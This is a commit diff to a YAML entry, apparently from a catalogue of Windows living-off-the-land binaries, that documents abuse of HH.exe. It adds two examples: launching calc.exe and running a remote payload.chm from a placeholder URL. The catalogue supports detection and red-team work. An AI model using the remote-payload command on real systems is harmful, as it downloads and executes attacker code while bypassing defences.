Fixing issue with hh.yml

This commit is contained in:
Wietze 2024-11-20 23:24:00 +00:00
parent 089614e6a9
commit b46fc3f8c2
No known key found for this signature in database
GPG Key ID: E17630129FF993CF

View File

@ -14,6 +14,8 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe
Category: Execute
Privileges: User
@ -22,6 +24,7 @@ Commands:
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute